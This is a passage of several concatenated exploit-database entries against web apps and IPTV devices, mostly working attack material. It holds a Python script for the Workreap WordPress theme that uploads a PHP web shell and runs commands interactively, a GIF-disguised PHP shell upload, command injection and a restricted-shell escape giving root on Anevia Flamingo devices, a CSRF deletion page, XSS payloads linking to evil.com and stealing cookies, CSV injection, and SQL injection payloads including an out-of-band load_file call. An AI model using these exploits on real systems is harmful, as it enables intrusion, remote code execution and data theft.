a user account that the attacker wants to delete. For example, [email protected] 3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example: <html> <body> <form action="http://example.com/update.php" method="GET"> <input type="hidden" name="demail" value="[email protected]" /> </form> <script> document.forms[0].submit(); </script> </body> </html> 4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html 5. Send the URL of the HTML page to the admin user via email, social media, or any other means. If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.

# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution # Dork: inurl:/wp-content/themes/workreap/ # Date: 2023-06-01 # Category : Webapps # Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454 # Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l) # Version: 2.2.2 # Tested on: Windows/Linux # CVE: CVE-2021-24499 import requests import random import string import sys def usage(): banner = ''' NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution usage: python3 Workreap_rce.py <URL> example for linux : python3 Workreap_rce.py https://www.exploit-db.com example for Windows : python Workreap_rce.py https://www.exploit-db.com ''' print(f"{BOLD}{banner}{ENDC}") def upload_file(target): print("[ ] Uploading File") url = target + "/wp-admin/admin-ajax.php" body = "<?php echo '" + random_str + "';?>" data = {"action": "workreap_award_temp_file_uploader"} response = requests.post(url, data=data, files={"award_img": (file_name, body)}) if '{"type":"success",' in response.text: print(f"{GREEN}[+] File uploaded successfully{ENDC}") check_php_file(target) else: print(f"{RED}[+] File was not uploaded{ENDC}") def check_php_file(target): response_2 = requests.get(target + "/wp-content/uploads/workreap-temp/" + file_name) if random_str in response_2.text: print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}") print("path: " + target +"/wp-content/uploads/workreap-temp/" + file_name) question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}") if question == "y" or question == "Y": print("[ ] Uploading Shell ") get_rce(target) else: usage() else: print(f"{RED}[+] PHP file not allowed on this website. Try uploading another file.{ENDC}") def get_rce(target): file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php" body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>' data = {"action": "workreap_award_temp_file_uploader"} response_3 = requests.post(target + '/wp-admin/admin-ajax.php', data=data, files={"award_img": (file_name, body)}) print(f"{GREEN}[+] Shell uploaded successfully{ENDC}") while True: command = input(f"{YELLOW}Enter a command to execute: {ENDC}") print(f"Shell Path : {target}'/wp-content/uploads/workreap-temp/{BOLD}{file_name}?c={command}{ENDC}") response_4 = requests.get(target + '/wp-content/uploads/workreap-temp/' + file_name + f"?c={command}") print(f"{GREEN}{response_4.text}{ENDC}") if __name__ == "__main__": global GREEN , RED, YELLOW, BOLD, ENDC GREEN = '\033[92m' RED = '\033[91m' YELLOW = '\033[93m' BOLD = '\033[1m' ENDC = '\033[0m' file_name = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) + ".php" random_str = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8)) try: upload_file(sys.argv[1]) except IndexError: usage() except requests.exceptions.RequestException as e: print("\nPlease Enter Valid Address")

Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation Date: 17-01-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: <https://phpgurukul.com> Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/> Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3187 =============================== STEPS_TO_REPRODUCE =============================== 1. Login into Teacher-Account with the credentials “Username: [email protected]” Password: Test@123” 2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image 3. Open the Burp-suite and Intercept the Edit Image Request 4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ” 5. Change the **Content-type from “ image/png “ to “ image/gif “ 6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>` 7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension** 8. Below is the Burpsuite-POST Request for all the changes that I have made above ========================================== BURPSUITE_REQUEST ========================================== POST /trms/teacher/changeimage.php HTTP/1.1 Host: localhost Content-Length: 442 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: <http://localhost> Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: <http://localhost/trms/teacher/changeimage.php> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc Connection: close ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="subjects" John Doe ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif" Content-Type: image/gif GIF89a <?php echo system($_REQUEST['dx']); ?> ------WebKitFormBoundaryndAPYa0GGOxSUHdF Content-Disposition: form-data; name="submit" ------WebKitFormBoundaryndAPYa0GGOxSUHdF-- =============================== PROOF_OF_CONCEPT =============================== GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md

Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities Google Dork: NA Date: 09-06-2023 EXPLOIT-AUTHOR: AFFAN AHMED Vendor Homepage: <https://www.sourcecodester.com/> Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code> Version: 1.0 Tested on: Windows 11 + XAMPP CVE : CVE-2023-3184 ============================== CREDENTIAL TO USE ============================== ADMIN-ACCOUNT USERNAME: admin PASSWORD: admin123 ============================= PAYLOAD_USED ============================= 1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a> 2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a> 3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a> 4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a> =============================== STEPS_TO_REPRODUCE =============================== 1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN CREDENTIALS OF ADMIN 2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user` 3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename` `lastname` and in `username` 4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON 5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER IS ADDED . 6. AFTER CLICKING ON THE EACH PAYLOAD IT REDIRECT ME TO EVIL SITE ========================================== BURPSUITE_REQUEST ========================================== POST /php-sts/classes/Users.php?f=save HTTP/1.1 Host: localhost Content-Length: 1037 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-sts/admin/?page=user/manage_user Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn Connection: close ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="id" ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="firstname" <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="middlename" <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="lastname" <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="username" <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a> ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="password" 1234 ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="type" 2 ------WebKitFormBoundary7hwjNQW3mptDFOwo Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary7hwjNQW3mptDFOwo-- =============================== PROOF_OF_CONCEPT =============================== GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md

Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution Exploit Author: LiquidWorm Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.6.5 Hardware revision: 1.1 SoapLive 2.4.0 SoapSystem 1.3.1 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Tested on: GNU/Linux 3.14.29 (x86_64) Apache/2.2.22 (Debian) PHP/5.6.0-0anevia2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5778 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php 13.04.2023 -- $ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data <td>uid=33(www-data)</td> <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/> <td>gid=33(www-data)</td> <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/> <td>groups=33(www-data),6(disk),25(floppy)</td> <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/> --- $ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root <td>uid=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/> <td>gid=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/> <td>groups=0(root)</td> <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>

Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution Exploit Author: LiquidWorm Vendor: Ateme Product web page: https://www.ateme.com Affected version: 3.6.20, 3.2.9 Hardware revision 1.1, 1.0 SoapLive 2.4.1, 2.0.3 SoapSystem 1.3.1 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: The affected device suffers from authenticated remote code execution vulnerability. A remote attacker can exploit this issue and execute arbitrary system commands granting her system access with root privileges. Tested on: GNU/Linux 3.1.4 (x86_64) Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5779 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php 13.04.2023 -- > curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.1.1:80... * Connected to 192.168.1.1 (192.168.1.1) port 80 (#0) > POST /admin/time.php HTTP/1.1 > Host: 192.168.1.1 > User-Agent: curl/8.0.1 > Accept: */* > Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4 > Content-Length: 32 > Content-Type: application/x-www-form-urlencoded > } [32 bytes data] 100 32 0 0 100 32 0 25 0:00:01 0:00:01 --:--:-- 25< HTTP/1.1 302 Found < Date: Thu, 13 Apr 2023 23:54:15 GMT < Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 < X-Powered-By: PHP/5.3.6 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache * Please rewind output before next send < Location: /admin/time.php < Transfer-Encoding: chunked < Content-Type: text/html < * Ignoring the response-body { [5 bytes data] 100 32 0 0 100 32 0 19 0:00:01 0:00:01 --:--:-- 19 * Connection #0 to host 192.168.1.1 left intact * Issue another request to this URL: 'http://192.168.1.1/admin/time.php' * Switch from POST to GET * Found bundle for host: 0x1de6c6321b0 [serially] * Re-using existing connection #0 with host 192.168.1.1 > POST /admin/time.php HTTP/1.1 > Host: 192.168.1.1 > User-Agent: curl/8.0.1 > Accept: */* > Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4 > < HTTP/1.1 200 OK < Date: Thu, 13 Apr 2023 23:54:17 GMT < Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 < X-Powered-By: PHP/5.3.6 < Expires: Thu, 19 Nov 1981 08:52:00 GMT < Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 < Pragma: no-cache < Transfer-Encoding: chunked < Content-Type: text/html < { [13853 bytes data] 14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br /> <----------------------<< 14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br /> <----------------------<< 100 33896 0 33896 0 0 14891 0 --:--:-- 0:00:02 --:--:-- 99k * Connection #0 to host 192.168.1.1 left intact

Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak Exploit Author: LiquidWorm Product web page: https://www.ateme.com Affected version: 3.2.9 Hardware revision 1.0 SoapLive 2.0.3 Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks. Desc: Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can breakout of the restricted environment and have full root access to the device. Tested on: GNU/Linux 3.1.4 (x86_64) Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5780 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php 13.04.2023 -- $ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 [email protected] The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established. RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts. Anevia Flamingo XL [email protected]'s password: Primary-XL> help available commands: bonding config date dns enable ethconfig exit exp firewall help hostname http igmpq imp ipconfig license log mail passwd persistent_logs ping reboot reset route serial settings sslconfig tcpdump timezone traceroute upgrade uptime version vlanconfig Primary-XL> tcpdump ;id tcpdump: illegal token: ; Primary-XL> id unknown command id Primary-XL> whoami unknown command whoami Primary-XL> ping ;id ping: ;id: Host name lookup failure Primary-XL> traceroute ;id BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries] [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface] [-z pausemsecs] host [data size] trace the route ip packets follow going to "host" Options: -F Set the don't fragment bit -I Use ICMP ECHO instead of UDP datagrams -l Display the ttl value of the returned packet -d Set SO_DEBUG options to socket -n Print hop addresses numerically rather than symbolically -r Bypass the normal routing tables and send directly to a host -v Verbose output -m max_ttl Set the max time-to-live (max number of hops) -p port# Set the base UDP port number used in probes (default is 33434) -q nqueries Set the number of probes per ``ttl'' to nqueries (default is 3) -s src_addr Use the following IP address as the source address -t tos Set the type-of-service in probe packets to the following value (default 0) -w wait Set the time (in seconds) to wait for a response to a probe (default 3 sec) -g Specify a loose source route gateway (8 maximum) uid=0(root) gid=0(root) groups=0(root) Primary-XL> version Software Revision: Anevia Flamingo XL v3.2.9 Hardware Revision: 1.0 (c) Anevia 2003-2012 Primary-XL> traceroute ;sh ... ... whoami root id uid=0(root) gid=0(root) groups=0(root) ls -al drwxr-xr-x 19 root root 1024 Oct 3 2022 . drwxr-xr-x 19 root root 1024 Oct 3 2022 .. drwxr-xr-x 2 root root 1024 Oct 21 2013 bin drwxrwxrwt 2 root root 40 Oct 3 2022 cores drwxr-xr-x 13 root root 27648 May 22 00:53 dev drwxr-xr-x 3 root root 1024 Oct 21 2013 emul drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc drwxr-xr-x 3 root root 1024 Oct 3 2022 home drwxr-xr-x 11 root root 3072 Oct 21 2013 lib lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib drwx------ 2 root root 12288 Oct 21 2013 lost+found drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions dr-xr-xr-x 177 root root 0 Oct 3 2022 proc drwxr-xr-x 4 root root 1024 Oct 21 2013 root drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin drwxr-xr-x 12 root root 0 Oct 3 2022 sys drwxrwxrwt 26 root root 1140 May 22 01:06 tmp drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr drwxr-xr-x 14 root root 1024 Oct 21 2013 var ls /var/www/admin _img configuration.php log_securemedia.php stream_dump.php _lang cores_and_logs_management.php login.php stream_services _lib dataminer_handshake.php logout.php streaming.php _style dvbt.php logs.php support.php about.php dvbt_scan.php main.php template ajax export.php manager.php time.php alarm.php fileprogress.php network.php toto.ts alarm_view.php firewall.php pear upload_helper.php authentication.php get_config power.php uptime.php bridges.php get_enquiry_pending.php read_settings.php usbloader.php cam.php get_upgrade_error.php receive_helper.php version.php channel.php heartbeat.php rescrambling webradio.php channel_xl_list.php include rescrambling.php webtv check_state input.php resilience webtv.php class js resilience.php xmltv.php common license.php restart_service.php config_snmp.php log.php set_oem.php python -c 'import pty; pty.spawn("/bin/bash")' root@Primary-XL:/# cd /usr/local/bin root@Primary-XL:/usr/local/bin# ls -al login -rwxr-xr-x 1 root root 35896 Feb 21 2012 login root@Primary-XL:/usr/local/bin# cd .. root@Primary-XL:/usr/local# ls commands/ bonding firewall mail timezone config help passwd traceroute date hostname persistent_logs upgrade dbg-serial http ping uptime dbg-set-oem igmpq route version dbg-updates-log imp serial vlanconfig dns ipconfig settings ethconfig license sslconfig exp log tcpdump root@Primary-XL:/usr/local# exit exit Primary-XL> enable password: Primary-XL# ;]

Exploit Title: projectSend r1605 - CSV injection Version: r1605 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 11-06-2023 Author: Mirabbas Ağalarov Tested on: Windows 2. Technical Details & POC ======================================== Step 1. login as user step 2. Go to My Account ( http://localhost/users-edit.php?id=2 ) step 3. Set name as =calc|a!z| step 3. If admin Export action-log as CSV file ,in The computer of admin occurs csv injection and will open calculator ( http://localhost/actions-log.php ) payload: =calc|a!z|

Exploit Title: projectSend r1605 - Stored XSS Application: projectSend Version: r1605 Bugs: Stored Xss Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 11-06-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== 1. Login as admin 2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php) 3. Go to new JS (http://localhost/custom-assets-add.php?language=js) 4. Set content as alert("xss"); and set public 5. And Save 6. Go to http://localhost (logout) payload: alert("xss") POST /custom-assets-add.php HTTP/1.1 Host: localhost Content-Length: 171 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/custom-assets-add.php?language=js Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l Connection: close csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head

# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS) # Date: 2023-06-13 # Exploit Author: tmrswrr # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested : https://www.softaculous.com/softaculous/demos/Monstra --- Description --- 1) Login admin panel and go to Pages: https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages 2) Click edit button and write your payload in the Name field: Payload: "><script>alert(1)</script> 3) After save change and will you see alert button https://demos3.softaculous.com/Monstraggybvrnbr4/

# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-06-12 # Exploit Author: tmrswrr # Vendor Homepage: https://xoops.org/ # Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10 # Version: 2.5.10 # Tested : https://www.softaculous.com/apps/cms/Xoops --- Description --- 1) Login admin panel and click Image Manager , choose Add Category : https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images 2) Write your payload in the Category Name field and submit: Payload: <script>alert(1)</script> 3) After click multiupload , when you move the mouse to the payload name, you will see the alert button https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2

## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi ## Author: nu11secur1ty ## Date: 06.12.2023 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can dump all information from the database of this system, and then he can use it for dangerous and malicious purposes! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: password (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: [email protected]&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT (ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html) ## Time spend: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 2023-06-13 # Exploit Author: tmrswrr # Vendor Homepage: https://textpattern.com/ # Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip # Version: v4.8.8 # Tested : https://release-demo.textpattern.co/ --- Description --- 1) Login admin page , choose Content , Articles section : https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2 2) Write in Excerpt field this payload > "><script>alert(document.cookie)</script> 3) Click My Site will you see alert button https://release-demo.textpattern.co/index.php?id=2 --- Request --- POST /textpattern/index.php HTTP/2 Host: release-demo.textpattern.co Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://release-demo.textpattern.co/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351 Content-Length: 4690 Origin: https://release-demo.textpattern.co Dnt: 1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="ID" 2 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="event" article -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="step" edit -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Title" hello -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="textile_body" 1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Body" hello -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="textile_excerpt" 1 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Excerpt" "><script>alert(document.cookie)</script> -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sPosted" 1686684925 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="sLastMod" 1686685069 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="AuthorID" managing-editor179 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="LastModID" managing-editor179 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Status" 4 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="Section" articles -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="override_form" article_listing -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="year" 2023 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="month" 06 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="day" 13 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="hour" 19 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="minute" 35 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="second" 25 -----------------------------26516646042700398511941284351 Content-Disposition: form-data; name="exp_year" -----------------------------26516646042700398511941284351 